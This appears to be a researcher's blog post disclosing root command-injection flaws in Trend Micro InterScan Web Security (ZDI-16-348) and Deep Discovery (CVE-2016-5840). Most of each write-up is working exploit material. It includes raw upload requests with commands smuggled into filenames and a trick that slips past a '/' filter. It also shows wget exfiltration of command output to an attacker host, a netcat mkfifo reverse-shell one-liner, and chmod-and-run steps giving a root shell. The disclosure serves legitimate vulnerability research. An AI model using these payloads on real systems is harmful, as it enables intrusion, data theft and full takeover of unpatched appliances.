Multiple Vulnerabilities – Trend Micro Control Manager 6.0

The following are publicly disclosed vulnerabilities I discovered with TrendMicro Control Manager 6.0

Full details of the vulnerabilities have not been agreed upon for disclosure, so this is more for record keeping than anything else.  Please do not inquire for details as there is no agreement in place for me to divulge any.  As much as I would love to discuss and help, I prefer staying out of jail much more 🙂

  • ZDI-CAN-3634 – Closed without public disclosure (unknown reasoning as it was/is a valid finding)

SQL Injection with RCE:

XXE:

XPATH Injection:

ZDI-16-348: Trend Micro InterScan Web Security ManagePatches filename Remote Code Execution Vulnerability

Version: IWSVA65sp2

Summary:

The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including ‘Report Only’ users) to execute commands under the context of the root user.

Details:

The com.trend.iwss.gui.servlet.ManagePatches servlet is used by elevated privilege users to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their cookie into the request (below is a sample of the stripped down valid request).

POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Connection: close
Content-Type: multipart/form-data; boundary=—————————141658507810329061771972399818
Content-Length: 259

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml”
Content-Type: text/xml

—————————–141658507810329061771972399818–

The actual injection takes place in the name of the file being uploaded. By performing the following tests, the delay in responses indicates that command execution is occurring.

Initial test:

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 10″
Content-Type: text/xml

Secondary test:

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 30″
Content-Type: text/xml

This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) are possible.

By issuing a ‘wget <ip>’ of the attacker machine, a response is seen. However, exfiltrating information a bit more tricky. Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user running a wget to retrieve the current user using the given command (where [ip address] is your receiving machine):

Command –

filename=”test.xml&wget `echo [ip address]“echo $PATH | cut -c1“id`”

EXPLANATION: using ` (or even $()) to escape, it is possible to pull the ‘/’ character from the current $PATH and insert it into the command, creating the full wget of [ip address]/`id`

Apache Log –

4

This grants the ability to exfiltrate some data, as well as upload (via wget) files.

Now the attacker has the ability to create a shell by uploading a file containing the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.xml&wget `echo [ip address]“echo $PATH | cut -c1`shell

Once the file has been uploaded (will be placed in the /var/iwss/patch/bin folder), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

5

CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability

Version: TDA 2.6.1062r1

Summary:

The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.

Details:

The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used:

POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=—————————7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=

—————————–7e0823930136
Content-Disposition: form-data; name=”ajaxuploader_file”; filename=”test.txt”
Content-Type: text/plain

a
—————————–7e0823930136–

The actual injection takes place in the name of the file being uploaded (ie. filename=”test.txt&id”). By performing the following request, system information is sent back in the response:

1

This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) commands are possible.

Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print ‘/‘ to the final command):

2

Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.txt&wget http:`echo $PATH | cut -c1“echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

3